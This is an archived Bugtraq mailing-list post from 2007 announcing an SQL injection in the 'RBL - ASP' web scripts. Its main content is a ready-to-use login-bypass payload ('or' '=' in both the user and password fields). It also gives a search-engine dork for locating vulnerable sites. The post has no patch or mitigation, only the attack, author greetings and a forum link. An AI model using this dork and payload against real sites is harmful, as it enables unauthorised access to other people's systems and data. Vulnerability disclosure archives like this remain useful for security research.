[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RBL - ASP (scripts with db) SQL injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: RBL - ASP (scripts with db) SQL injection
From: sn0oPy.team@xxxxxxxxx
Date: 27 Jan 2007 23:44:45 -0000

* RBL - ASP  (scripts with db) SQL injection

* By : sn0oPy

* Risk : high

* Site : http://www.aspside.com

* Dork : intitle:"RBL - ASP" 

* exploit :

         user = 'or' '='
         pass = 'or' '='            
         

* contact : sn0oPy@xxxxxxxxxxxxxxxxxxxxxxx

* greetz : [subzero], Avg Team(http://forums.avenir-geopolitique.net).

reference = http://forums.avenir-geopolitique.net/viewtopic.php?t=2607

Prev by Date: VII National Computer and Information Security Conference ACIS 2007 - COLOMBIA
Next by Date: Oracle - Indirect Privilege Escalation and Defeating Virtual Private Databases
Previous by thread: VII National Computer and Information Security Conference ACIS 2007 - COLOMBIA
Next by thread: Oracle - Indirect Privilege Escalation and Defeating Virtual Private Databases
Index(es):
- Date
- Thread